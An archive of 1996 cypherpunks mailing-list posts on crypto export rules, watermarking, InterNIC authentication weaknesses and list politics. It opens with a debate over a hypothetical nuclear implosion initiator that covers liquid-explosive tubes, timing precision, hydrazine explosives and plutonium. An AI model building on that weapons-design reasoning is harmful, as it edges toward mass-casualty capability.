> every other lowly undergrad at MIT, was the fact that I did something he had 
> tried many times and failed to do:  For my strobe laboratory project, 
I decided 
> that I was going to photograph a popcorn kernel opening up at 10,000 frames 
> per second.  He called it "impossible": I called it a challenge.  That is 
> why I did the  project.  I showed him 11 frames taken a few weeks later.
>
> Dr. Edgerton was suitably impressed.

The reader will notice now how the author has gone from associating with 
the "big" name to being superior to the "big" name.  The intent is to 
bolster holed credibility even further.  This tactic will be recognized 
by the astute political observer as "link and exceed."  (Most often used 
with our favorate "big" name, JFK.
 
> >> >1>  Interference from the milling shape and accuracy o
> f the openings to 
> >> >the tubes containing the liquid explosive.
> >> 
> >> Quantify, quantify.  How much of a problem?
> >
> >Clever question given that I am without any information as to the exact 
> >shape of your tubes, if they are bowled down towards the explosive 
> >assembly, or what their exact width (excepting your vague 1mm figure) 
> >might be.  You make some guesses as to material, but these two are fairly 
> >flimsy even by your own admission.
> 
> I don't expect you to be able to "use ESP" and anticipate all the exact 
> mistakes somebody could make.  Rather, you should be willing to accept the 
> principle, and explain how much inaccuracy is "too much," and try to give an 
> example of an error that would produce an inaccuracy of this magnitude.  So 
> far you've done none of this.  I have to conclude you were simply trolling, 
> or intentionally spreading FUD (Fear, Uncertainty, and Doubt) without 
> genuinely trying to get involved in an interesting hypthetical idea.

Without more on your shape and size of the core, its essentially 
impossible to say what timing difference will be debilitating.  I did 
infact give an example related to fractions of the branch tube lengths.  
Without more from you, the supposed originator of the idea, no one can 
tell you how much timing error is enough.  The answer in general form 
is:  Enough to cause the center shape to displace enough of it's mass 
away from the direct brunt of force from the opposed charge.  Most 
excessively, some of the branch tubes might fail to initiate all 
together.  The quantity of all this depends so specifically on the type of 
explosive used for the compression, the exact density of your core, the 
number of facets you use in your compressive assembly and the location of 
initiation on the facets so as to be entirely useless without precise 
details.  What I can tell you is that it's enough of a problem to make 
high speed precise switches necessary.  Be real, if the timing problem 
was enough to make even normal resistance matching a problem, how the 
hell are you going to solve it with a much more volitle and violent 
initiation method?

> BTW, while I do indeed consider this as purely hypothetical, on the 
> offchance you're a FUDmeister from the government, you should be aware that 
> _I'm_ fully aware that while the main form of radioactive emanation from 
> Pu-239 is alphas which can be stopped by a piece of paper or a few inches of 
> air, I am also fully aware that the decay produces a substantial quantity of 
> gamma radiation (whose exact wavelengths and energies I can easily look up 
> in my trusty CRC Handbook).   So don't bother flying an airplane equipped 
> with a gamma ray detector over my house;

[additional paranoid rantings intended to bolster the authors image by 
substitute knowledge deleted]

> >All you need to realize to appreciate the problem is that if you do not 
> >have a precisely milled end, with a precise depth into the compressing high 
> >explosive outer face, you have differences in how and when the various 
> >faces of the explosive assembly are going to initiate.  If you make your 
> >tubes narrow, it becomes very hard to mill the ends of your tubes, and if 
> >you widen the tubes, it exagerates the distortive effect of 
> >irregularities in the tube ends.
> 
> But you should be able to estimate the magnitude of the errors.  Given a 
> certain detonation velocity, for example, and assuming some sort of 
> localized slowdown/speedup to to this velocity, you should be able to 
> estimate (even if only accurate to a factor of 2-3) the amount of error 
> present at that particular junction.

I did that with the example related to tube length. (Which you quite 
cleverly deleted)  I'm hardly going to sit down and do models of shaped 
explosive dynamics and hydraluic shock analysis simply to tell you 
you're way off.  If your so interested, examine the problem yourself.

  Again, the fact that you have never 
> done even this rudimentary analysis is quite telling.  You've revealed 
> nothing that I wasn't aware of, and that was apparently quite intentional.

What you were and are aware of is a matter for significant speculation, 
complicated by your characterization of shape charge analysis (especially 
with liquid explosive) as "rudimentary analysis."

> >I'm not in the business of designing nuclear initiators.  I expose poorly 
> >thought out explosive engineering as a hobby.  Your best solution is to 
> >mill each tube exactly alike, right down the the degree of bend and slope 
> >of arc as well as shape of either end.  But you could have figured that 
> >out without me spelling it our for you.
> 
> More likely, I would have velocity-tested sample configurations down to 10 
> nsec accuracy, which would have revealed any unexpected error sources from 
> temperature and/or pressure variation, as well as mechanical considerations 
> such as bent tubing, etc... 

But since you haven't tested it, and don't plan to, we can't know can 
we?  Moreover, since your design was only marginally if ever interested 
in these problems, one has to assume you're way off the ball.  Your 10ns 
accuracy figure is pulled right out of the air and in no way represents a 
figure you know you can obtain.  I don't believe such accuracy can be 
obtained with this kind of physical inititation.  I'm not telling you to 
stop trying, you can do what you like.  I will, however, expose your 
oversights in order to facilitate reputation capital distribution by the 
list.  (To which I now apologize for the massive spam).

> [stuff deleted]
> 
> >But they don't.  The timing problem is quite significant.  Why do you 
> >think high speed and superaccurate switches are so well guarded?  There 
> >isn't an easy grassroots substitute, if there were, the switches would be 
> >fairly useless.
> 
> Maybe that's the secret.  I already anticipated this.

[You keep saying that, (I already anticipated this.) I'm not quite sure you 
know how much you sound like an apologist]

  If it's the 
> government's motivation to keep "terrorists" from trying to build a bomb, 
> then their first line of defense might be to make it appear more difficult 
> than it really is.  They also know that secrets which are actually turned 
> into running, installed hardware eventually leak to the public, meaning that 
> it might actually be better to keep THEIR bombs complicated, and to not use 
> simplifying hardware. 

Oh, whatever.  Get a grip.  These paranoid rantings intended to deflect 
and distract from the main failings in your design are more than obvious.

> >> >Remember, kryonic switiches are necessary even when dealing with the 
> >> >speeds of electric conductivity.  The velocities of even hydrazine based 
> >> >explosives are signigicantly lower.  The margin for error is similarly 
> lower.
> >> 
> >> How low?  Be specific.
> >
> >Again, I don't know what your dimentions are.  Hydrazine explosives tend 
> >to detonate around 8500-10000 m/s.  The speed of transmission of electric 
> >impulses through a given conductive medium is certainly much higher.
> 
> Why do you keep mentioning "hydrazine explosives" when I didn't?  Are you 
> some sort of "one-trick pony"?

No, they are just the simpliest liquid explosives to obtain and make, and 
happen to have the highest detonation velocities.  I assumed you would be 
using them.  Perhaps I overestimated the depth of your thought on this 
matter.

> >You are correct this time.  My fault.  Uranium should have been in there.  
> >Typo on my part. 
> 
> Finally!  He's able to admit a MISTAKE!  

When I make them, I admit them.
 
> >Hey, be my guest.  If you had a critical mass worth of plutonium you're 
> >playing around with the wrong list, and, I might add, wasting your time 
> >with anything but the black market for the material.
> 
> If I had some, or for that matter if I even wanted some, would I be 
> advertising the fact on an "NSA-required-reading" list BEFORE I'd done 
> all this work?

As I said before, the degree of your expertise and wisdom is the primary 
issue in debate.

---
My prefered and soon to be permanent e-mail address: unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Sun, 25 Feb 1996 05:23:05 +0800
To: nobody@REPLAY.COM (Anonymous)
Subject: Re: Digital Watermark
In-Reply-To: <199602240347.EAA05595@utopia.hacktic.nl>
Message-ID: <199602242040.PAA19841@homeport.org>
MIME-Version: 1.0
Content-Type: text


	Creating watermarks that can't be removed without degrading
image quality is not especially difficult.  The two tricky bits are
durability and collusion protection.

	Durability involves ensuring enough of a watermark remains
after the image is converted to a JPEG.  Colusion protection is making
sure that users can't compare images and remove the watermark without
a large number of users being involved.

Adam


| Financial Times, 22 Feb 96

| Attempts to remove the watermark would be virtually
| impossible without degrading the image quality. Moreover,
| counterfeiting would be almost impossible, says NEC. the
| Japanese electronics company.

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Sun, 25 Feb 1996 05:29:58 +0800
To: alano@teleport.com (Alan Olsen)
Subject: Re: Cluelessness V.S. Lack of Knowledge
In-Reply-To: <2.2.32.19960223212901.00899578@mail.teleport.com>
Message-ID: <199602242053.PAA19914@homeport.org>
MIME-Version: 1.0
Content-Type: text


	If someone shows up, having read the sci.crypt FAQ and/or
Applied Cryptography, I think that their questions will be answered
without flames.  But if people fail to read whats out there, and want
to be spoon fed, well, thats another matter.

Adam


Alan Olsen wrote:

| I know of one developer who is trying to implement a strong
| cryptosystem in his app.  He is unwilling to post his
| questions/concerns here because he is afraid of getting his ass
| shot off on the first query.  Judging by some of the responses
| I have seen, I do not blame him!  I can understand intolerance
| of the sales droids who push crap.  I do not have much
| tolerance for them either.  It bothers me when I see people who
| are not experts in the field AND ARE TRYING TO LEARN getting
| "blowed up real good" because they are not experts.

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mother Jones Electronic Subscription <esub@mojones.mojones.com>
Date: Sun, 25 Feb 1996 20:22:09 +0800
To: motherjones-list@mojones.mojones.com
Subject: Thank you, MoJo Wire beta-testers
Message-ID: <199602250053.QAA07841@mojones.mojones.com>
MIME-Version: 1.0
Content-Type: text/plain


Thanks for being a MoJo Wire beta-tester.  We appreciate all your comments and suggestions for our site.  

We've created a new mailing list to keep people up-to-date on the happenings at the MoJo Wire:

http://www.motherjones.com/

Look for updates on:

*Our Election 96 Area:

        Regular RealAudio and text field reports from our "smarty-pants political writers."

*Mother Jones Magazine:

        We put every issue of Mother Jones magazine on-line. And we aren't just dumping in the text files either. Each issue is optimized for online viewing, with searchable databases, clickable imagemaps and more.

*Special MoJo Wire Investigative features:

        Here's where we bring you what no print magazine can. We combine the flexibilty of the Internet with in-depth reporting to give you a whole new form of investigative journalism.



 To unsubscribe from our newsletter, please send an e-mail to majordomo@motherjones.com. In the body of the message (not the subject header) type:

	unsubscribe motherjones-list  [your e-mail address]

for example:

	unsubscribe motherjones-list umansky@motherjones.com


Again, thanks for your help and we hope to see and chat with you on our web site and Live Wire (the interactive chat area of The MoJo Wire). 

Questions, comments? E-mail mailinglist@motherjones.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Mon, 26 Feb 1996 02:33:15 +0800
To: Jim_Miller@bilbo.suite.com
Subject: Re: "E-Money" is trademarked
In-Reply-To: <9602240556.AA26142@bilbo.suite.com>
Message-ID: <Pine.SV4.3.91.960224181903.6684C-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


All you have to do, is show you were uising the term beofre they 
registered their trademark. Then sell them your right to use the term.
It should be worth a few grand.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Sun, 25 Feb 1996 08:27:12 +0800
To: cypherpunks@toad.com
Subject: fwd: Federal Internet Enforcement Policy
Message-ID: <v02120d01ad5551df4350@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text

X-Sender: oldbear@pop.tiac.net
Mime-Version: 1.0
Date: Sat, 24 Feb 1996 17:56:31 -0500
To: rah@shipwright.com
From: The Old Bear <oldbear@arctos.com>
Subject: fwd: Federal Internet Enforcement Policy

--- Forwarded message follows ---

The "Federal Internet Indecency Crawler" has determined your Newsgroup
or Web Site posting to be in violation of the "Exxxon Communications
Indecency Act of 1996".

In an effort to comply with the "Federal Paperwork Reduction Act" you
are hereby directed to complete the proper arrest warrant paperwork
and submit same to the Federal Court in your district, then obtain a
valid copy of the approved arrest warrant and serve said warrant upon
yourself.

To properly initiate this procedure, you are required to submit Form
A-16844787033 -83259 (rev.02) in triplicate, which may be obtained from
the US Government printing office.  After completion, send the original
to the Federal Courthouse by certified mail with one copy mailed to your
local FBI office.  Please make certain to include all pertinent
information, including the specific word, words or phrases that
constituted the violation, together with your name, address, telephone
number, social security number, and the policy number of any health
insurance contracts in which you are currently enrolled.

Also, please be reminded that as a citizen of the United States and a
lawfully appointed officer of the Federal Court "for the purpose of
serving the above arrest warrant only", you are exempted from any
prohibitions regarding carrying of handguns, rifles, shotguns or any
other type of guns or assault weapons while in the act of serving said
warrant.  However, please be advised that this provision does not apply
to you as the recipient of Federal arrest warrants, and as such your
constitutionally protected right to bear arms is hereby waived in this
instance.

It is important that you obtain your signature, thus showing the warrant
was properly executed. Kindly note any undue resistance encountered in
the appropriate space provided.

Because of the large amount of court resources which must be diverted
from other judicial efforts in order to accommodate the new "Exxxon
Communications Indecency Act", the Democratic and Republican National
Parties have made the following kind offer to assist us in enforcement
of these new policies.

As an alternative to the above process, you may at your option, send a
contribution of not less than $100 to the Clinton Presidential Campaign
Committee or to the Republican Presidential Nomination Committee.  If
you should choose one of these alternatives, it will not be necessary to
obtain and complete the paperwork outlined above, nor will it be
necessary to contact the Federal Court or your local FBI office.  Simply
copy the Newsgroup post in question or the URL and header information
from your web page, and mail to either party committee, with your
cashier's check or money order for $100 or more in US funds.

In addition to relieving you of the responsibility of filing legal
paperwork with the court and undergoing a traumatic arrest procedure,
you will have the comfort of knowing that you have contributed in a
meaningful way to the political process of your country.

In addition, we are authorized (by Senator Exxxon himself) to inform
you that after receiving your contribution of $100 or more, we will send
you a special alpha- numerical code which, when placed in your header
information, will prevent the "Federal Internet Indecency Crawler"
from recording your indecency violations until after the November
election.

Remember, because of the "Exxxon Communications Indecency Act"
constitutionally protected free speech is now in limited quantity.  So,
don't pass up this golden opportunity to avail yourself of unlimited
free expression for the next eight months.

This may be your last opportunity to do so!


127-A/4
rev.

--- end forwarded text


-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"Reality is not optional." --Thomas Sowell
The e$ Home Page: http://thumper.vmeng.com/pub/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Chris Grantham <casper@optima.mme.wsu.edu>
Date: Sun, 25 Feb 1996 14:14:19 +0800
To: "'cypherpunks@toad.com>
Subject: Testing
Message-ID: <01BB0301.79139E00@xtsd0203.it.wsu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Hi, my name is Chris!
casper@optima.mme.wsu.edu
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCNAzEvXtUAAAEEALtwrsq7zqQdTDRRpgJeCXYCuA6M49Yp93IE3ScaMwPPi297
EIEbpSyv3ZB9UBjTNHcsPADhfwDs8/yBS4SWW+NF1BwnRLUbNpZ5E6BGxGojQnF4
yC5MKNIuxDgY8FYYpsXWpxWIOJZOf5LY6E4BhZ9fGK/MfuhSvUFD9HN4zM2hAAUR
tC1DaHJpcyBXLiBHcmFudGhhbSA8Y2FzcGVyQG9wdGltYS5tbWUud3N1LmVkdT4=
=xznQ
-----END PGP PUBLIC KEY BLOCK-----
 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Sun, 25 Feb 1996 06:13:31 +0800
To: perry@piermont.com
Subject: Re: Cypherpunks vs. Coderpunks
Message-ID: <199602242149.OAA22592@usr2.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


** Reply to note from Perry E. Metzger <perry@piermont.com> 02/13/96  1:29pm -0500

  [snip] 
= The thing that makes Cypherpunks worthwhile is that its a place where
= you could, once, get news updates about GAK, information on the latest
= research into cryptography, organize mass key crackings, discuss APIs,
= talk a bit about the politics of cryptography, etc.
= 
    sounds like we're having the sme problems as "democracy" --it soon becomes  
irrelevant!  example:

	I was out of town for 6 days: I returned to find 1056 messages in the sorted 
    mailbox!  yes: 1056 messages which it took close to an hour to delete almost 800 
    of them as irrelevant. some you can discard automatically depending on the 
    author, some by content, etc. but I agree: it is clutter.

= Now, we get anonymous posters putting up bits on corruption in the
= DEA, sections of Tsutomu Shimomura's sex life, and other garbage. I
= don't give a damn if you think "Perry's a whining asshole; no one
= appointed him God", the stuff I'm mentioning is almost totally
= irrelevant to the topic at hand. (I *still* see no relevance to the
= late great Kevin Mitnick discussion, and frankly, I don't give a damn
= if he's in jail.) I also really am not impressed enough with the
= justification for why Jim Bell's "ideas" need to be discussed here.
= 
    well, it's probably worthwhile to announce the events, but not to comment ad  
infinitum on the gossip, the inferences, etc. --as you put it: the sex life of TS,  
particularly at the expense of one long term member.

    jim bell had the chance to publish his ideas --I read them  --once. I may be an  
"idealistic anarchist," but they are anarchy after the fact of submission to a  
government.  OK, they have been stated, but further discussion needs to move to  
another forum.  auto-trash filter....

    another major part of what I auto-trashed were two 50+ threads on some senseless  
topics which I have already forgotten. I suspect the poor snake was beaten to death  
by the BC Fat Lady....

= For some people without jobs (I won't name names) there is no problem
= with this. However, some of us have trouble keeping up, and
= unfortunately Cypherpunks has content that is key to our work and
= interests. 
= 
    THIS IS THE PROBLEM! Even if you do not have a fixed schedule, are not most of  
not data miners? It cost me over an hour to trim the message list from 1000+ to 200+.
WE NEED SOME SELF-RESTRAINT. 

= Sadly, there isn't another place with the momentum where people are a
= bit more polite and talk about the same information.
=
    unfortunately, the more publicity we receive, the more extraneous nonsense will  
be copied or target to us as a group.
 
= Yet.
= 
    well, I justify coderpunks since it breaks the ongoing technical discussions away  
from the mainstream cypherpunks. most of the information appears in cypherpunks  
itself, but if I must restrict my time, coderpunks comes first

= Perry

	as you say, Perry: 

	    'I don't give a damn if you think "Perry's a whining asshole; no one 
	    appointed him God"'

	I agree:
	
	    'I don't give a damn if they think "Attila's a whining asshole; no one 
	    appointed him God"'

	after all, as far as I know, I'm still "nobody" in the overall scheme, even  
    with a Piled higher and Deeper!  who _really_ cares what I think?

		-attila

"Fools fear adversity, but the wise man listens only to his conscience; or in other words,
"You've got exactly thirty seconds to get off my property before I start shooting, hippie."
        --Ching Chow


cc: cypherpunks@toad.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lmccarth@cs.umass.edu
Date: Sun, 25 Feb 1996 12:18:22 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: S/MIME outside the US?
In-Reply-To: <minimail_3130166c_9f453@lls.se>
Message-ID: <199602250349.WAA27926@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


volley@lls.se writes:
> If I got things right, DES is "exportable" as long as the keysize
> is kept under a certain size, which is too small to be really secure?

All things are exportable as long as the keysize is kept under a certain size,
which is too small to be really secure.  (Unless they're used for banking, or
only for authentication, or you're only taking it with you for personal use on
a trip, or....) 

> If that's the case, I guess RC2 is the last resort? Is it good enough,

The (alleged) source code has only been public for several weeks. No-one has
announced any major weakness in RC2, AFAIK, but then again the non-RSADSI
research community hasn't had much of a crack at it yet.

> or do I have to leave out S/MIME support, and just communicate with
> people outside the U.S or something?

A couple of points:

0) You can import whatever crypto code you like _into_ the U.S., subject to
any export restrictions that might be in effect in Sweden or wherever else
you might be.

1) People in the U.S. can legally use whatever algorithms and keysizes they 
wish in communicating with people outside the U.S.  We are forbidden to
export the crypto software, not messages processed by the software.

2) In view of 0) and 1), it is desirable to have people outside the U.S.
(you, for instance :) develop strong commercial crypto software with a 
fabulous UI and spread it far and wide. [The desirability of this trend is in
the eye of the beholder....]

-Lewis	"You're always disappointed, nothing seems to keep you high -- drive 
	your bargains, push your papers, win your medals, fuck your strangers;
	don't it leave you on the empty side ?"  (Joni Mitchell, 1972)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Computer Virus Help Desk <vhd@indy.net>
Date: Sun, 25 Feb 1996 13:42:06 +0800
To: cypherpunks@toad.com
Subject: New WWW Page
Message-ID: <2.2.32.19960225051516.0067c630@indy.net>
MIME-Version: 1.0
Content-Type: text/plain


 I'm pleased to announce the opening of a new Anti-Virus oriented Web Page.

                          http://www.a1.com/cvhd

  This page allows the download of the latest versions of ALL the popular
 DOS, WINDOWS and WIN95 Anti-Virus Software as well as links to EVERY major
  Anti-Virus software developer or distributor in the world. On Line Virus
 Encylopedia, Anti-Virus Tutorials and other utilities are available as well.

   The page also contains VERY extensive links to Encryption, Privacy,
    Military, Intelligence, Government and Law Enforcement Web Pages.

 Look for the addition of a new "On Line" real-time Anonymous Pre-mailer with
   remailer chaining capabilities to be added in the very near future.

                   Allen Taylor, Moderator, VIRUS_INFO
       SysOp, CVRC BBS, (317) 887-9568, Indianapolis, Indiana, USA
                          http://www.a1.com/cvhd





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: volley@lls.se (Pelle Claesson)
Date: Sun, 25 Feb 1996 09:28:58 +0800
To: cypherpunks@toad.com
Subject: S/MIME outside the US?
Message-ID: <minimail_3130166c_9f453@lls.se>
MIME-Version: 1.0
Content-Type: text/plain


(I'm doing some research on different security standards, as I'm
about to write an email/news program. Have been reading this list
for quite a while, and it's time to delurk.)


This is a quote from the S/MIME FAQ, as found on RSA's WWW server:

"S/MIME recommends three symmetric encryption algorithms: DES,
Triple-DES, and RC2.  The adjustable keysize of the RC2 algorithm
makes it especially useful for applications intended for export
outside the U.S.  RSA is the required public-key algorithm."

If I got things right, DES is "exportable" as long as the keysize
is kept under a certain size, which is too small to be really secure?
If that's the case, I guess RC2 is the last resort? Is it good enough,
or do I have to leave out S/MIME support, and just communicate with
people outside the U.S or something?


IMHO, these export restrictions on cryptography are completely insane.
Is there *any* way to bypass them (except for breaking the law)?


--
volley@lls.se




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lmccarth@cs.umass.edu
Date: Sun, 25 Feb 1996 18:19:55 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Web Browsers and Anonymous Mail
In-Reply-To: <312C161C.7E73@netscape.com>
Message-ID: <199602250959.EAA29402@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


I wrote:
# I would prefer not to reimplement SMTP using the Socket class in my own
# applets. Ideally I'd like to have an applet that presents a form with some
# entry boxes and check boxes, quantizes and encrypts the input according to
# the check box settings, and spews the resulting byte streams to the MTA.

Jeff Weinstein writes:
>   We do not curently allow Java to get access to our mail subsystem.

Hmmm.  Can I write an applet that reads form input, processes it, dumps the 
output to an applet window, and tells the user to cut & paste it into a
Netscape mail sending window ?  That would be a messier solution than I'd 
like, but still decent.

Thanks
-Lewis	"You're always disappointed, nothing seems to keep you high -- drive 
	your bargains, push your papers, win your medals, fuck your strangers;
	don't it leave you on the empty side ?"  (Joni Mitchell, 1972)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lmccarth@cs.umass.edu
Date: Sun, 25 Feb 1996 21:56:54 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: InterNIC Guardian Object Draft
In-Reply-To: <199602241712.MAA26212@ops.internic.net>
Message-ID: <199602251334.IAA29519@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

ftp://rs.internic.net/policy/internic/internic-gen-1.txt says:
> Jasdip Singh
> Network Solutions
> Mark Kosters
> Network Solutions
> 
> The InterNIC Guardian Object
> DRAFT

Thanks to Eric Eden for forwarding a copy to cypherpunks. I'd like to 
comment on the proposed set of authentication options (authorization schemes).

[...]
> Auth Scheme
> 
> Authorization scheme used to authenticate a Guardian before updating
> the Object it is guarding. The proposed schemes in an increasing
> order of strength are MAIL-FROM, CRYPT-PW, and PGP [1].
> 
> MAIL-FROM MAIL-FROM will parse the FROM: field in the mail header
> of an update message and match it with the email address
> of the Guardian guarding the Object to be updated.
> MAIL-FROM is the default Auth Scheme.

I realize this is meant to be the simplest/least-secure option. Nevertheless,
it seems to me that checking the "From " header instead of the "From:" header
would increase the security of this option at essentially no computational
cost. (I think "From " is commonly called "From_" in the literature these
days.) From_ is harder to forge than "From:", although that's not saying a
great deal.

Might I assume that the current InterNIC practice is to check "From:" ?
If so, you might consider switching to From_ in the interim, before the
Guardian Object stuff gets implemented.

> CRYPT-PW CRYPT-PW will encrypt the cleartext password supplied
> in an update message and match it with the encrypted
> password of the Guardian guarding the Object to be
> updated. Initially when a new Guardian is being
> registered or the authentication information is being
> added to an existing Contact, the encrypted password
> MUST be supplied. The Unix crypt(3) routine SHOULD be
> used to encrypt a cleartext password.

I think that Unix's md5(1) would be a better transformation choice. It is 
available to a similar extent as crypt(3), and is more inversion-resistant.
I'm not sure how the speeds compare. What sort of volume of update messages 
does InterNIC anticipate handling ?  

Also, if you use a hash function such as MD5, you don't need to fool around
with doing something like E_pass(pass). 

In Section 9.3, it says:
> The authentication information for a Guardian will be visible in WHOIS
> unless the Guardian chooses to keep it private. This information will
> be public by default because a Guarded Object should be protected by
> the inherent strength of the selected authorization scheme rather than
> by hiding the authorization information for its Guardian. 

I certainly appreciate the sentiment expressed here that "security through
obscurity" is a wash. However, in this particular situation I don't think
that's the right issue. Keeping the details of a security algorithm or
protocol is rather dubious in many cases. But it's entirely reasonable and
good for a security protocol to specify that some sensitive application data 
handled by the protocol will be hidden. Encryption is, after all, a way to
hide information....

Let me wax concrete now. :} If a Guardian uses CRYPT-PW and the authentication
information appears in the public WHOIS database, then an attacker can learn
crypt(3)_KEY(pass) just by looking up the WHOIS entry. Assuming the Guardian 
isn't hassling with managing a distinct key to encrypt the password, then the
attacker knows crypt(3)_pass(pass). Now she is all set to do an offline
password guessing attack. So exposing the ciphertext of the encrypted password
introduces a weakness.

More importantly, the CRYPT-PW protocol is subject to a replay attack. A 
passive attacker just needs to eavesdrop on an update message to learn the 
plaintext password. Then she can forge additional update messages using the 
purloined password, causing annoyance to Guardians using AFTER-UPDATE
notification and disruption to those using NOT-CARE update notification 
(i.e. none). 

> PGP PGP stands for Pretty Good Privacy [2]. The sender will
> sign the update message with a Guardian's secret PGP
> key. The InterNIC will verify the received update
> message with the Guardian's public PGP key. 

As far as I can see from the draft, the contact update templates do not
include date or time information. This makes the protocol vulnerable to 
a simple replay attack. An attacker can record update messages and replay
them to InterNIC later. 

Depending upon a Guardian's notification status, this could allow the 
attacker to confuse things by restoring an old contact information record. 
Even if a Guardian is using BEFORE-UPDATE, she might not notice that a
subtle change has been undone. An update notification message arriving on 
the heels of a similar one might get approved by a Guardian, who chalks it
up to a mail transport glitch.

Requiring some sort of timestamp field in the signed portion of the contact
templates would be good.

> How to
> register a Guardian's public PGP key with the InterNIC
> will be explained in another document.

Any hints on what this will be like ?

Hope this helps. Feel free to ask questions.

(cc:ed to cypherpunks@toad.com, jasdips@internic.net and markk@netsol.com)

Lewis	"You're always disappointed, nothing seems to keep you high -- drive 
	your bargains, push your papers, win your medals, fuck your strangers;
	don't it leave you on the empty side ?"  (Joni Mitchell, 1972)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMTBlC2f7YYibNzjpAQEJrgQAvhQHFbLPpL+n3jjFwO0LW4F72d3/lUcJ
yXhlxS0ko7+0SvXfmndAJ41S/queMjhcLwjJZRWtbQbtdc45lXQxJkykXafQz6Je
y+7T7ZwTMAIDAbd8hcpncv1C5NJrCTqEZNHnFxevmSyWtIgxzM+ndugwWyfVULCQ
JfkAa2ssxIA=
=2Q31
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Chris Grantham <casper@optima.mme.wsu.edu>
Date: Mon, 26 Feb 1996 03:01:08 +0800
To: "'Anonymous'" <nobody@REPLAY.COM>
Subject: RE: White House Not Decent
Message-ID: <01BB036D.31983D80@xtsd0318.it.wsu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Gee, Someone should forward this thing to Bill, Hmm I think I will...

Chris

----------
From: 	Anonymous[SMTP:nobody@REPLAY.COM]
Sent: 	Sunday, February 25, 1996 9:43 AM
To: 	cypherpunks@toad.com
Subject: 	White House Not Decent


(Reprinted without permission from the Seattle Times
Personal Technology section)


                 White House Site Blocked

Add the White House to the Internet's extensive list of dens of
sin.

Surfwatch, a widely used software program that prevents access
to, and downloading of, sexually explicit material on the
Internet, accidently blocked access to the White House home page
recently - all because a "White House for Kids" Web site address
contained the word "couples."

That's a dirty word in the Surfwatch universe because many
sexually explicit online sites use it as part of their come-on.

In this case, "couples" merely referred to the Executive Branch
tandems of President and Hillary Rodham Clinton and Al and Tipper
Gore.

Surfwatch fixed the problem within hours, although some might
still find the site offensive.

For political reasons, that is.









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 26 Feb 1996 00:01:56 +0800
To: cypherpunks@toad.com
Subject: TED_hal
Message-ID: <199602251539.KAA17780@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   2-25-96.

   The Wash Post has a Page One lead about "atomic bomb spy"
   Theodore Alvin Hall, who, as a young physicist at Los
   Alamos provided the Soviets with Manhattan Project secrets.
   Hall's role was revealed by gradual code-cracking of cables
   under the Venona program.

   Though discovered, for unknown reasons Hall was never
   charged and went on to a distinguished career at Cavendish
   Laboratory, Cambridge, England, where he now lives in
   retirement. Interviewed for the article he neither confirms
   nor denies he was the spy code-named "Mlad." He suggests it
   may be worth investigating why the US has kept silent about
   the case.

   The detailed story correlates Hall's role with the well-
   known atomic bomb spies; gives amazed responses of security
   officers then at Los Alamos; and lays out the long-term,
   never-give-up, FBI tracking and NSA cracking.

   For Unicorn and Bell: Hall was assigned to the Los Alamos
   "Gadgets" division and specialized in implosion devices.

   (With Hall, it's worth wondering if this ancient revelation
   and the recent 20-year-old NSA-spy have anything to do
   with the future of IC budgets -- teasing release of "if you
   knew what we know.")

   TED_hal










From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rishab Aiyer Ghosh <rishab@best.com>
Date: Mon, 26 Feb 1996 03:07:56 +0800
To: pierre@dragon.achilles.net (Pierre Bourque)
Subject: Hack attempt? "12 days" from anon.com
In-Reply-To: <Pine.SUN.3.91.960224183530.28777A-100000@dragon.achilles.net>
Message-ID: <199602251845.KAA09031@shellx.best.com>
MIME-Version: 1.0
Content-Type: text/plain



Regarding the mysterious mail from mailer-daemon@anon.com
that many people have received:
1. The mail was apparently sent by a daemon bouncing
   an undeliverable mail. anon.com is a "virtual domain"
   hosted at io.com, so it's unlikely that the daemon would
   have an anon.com address. 
2. Headers show it was routed through 38.10.221.81 and
   smtp1.interramp.com. That IP address showed up as
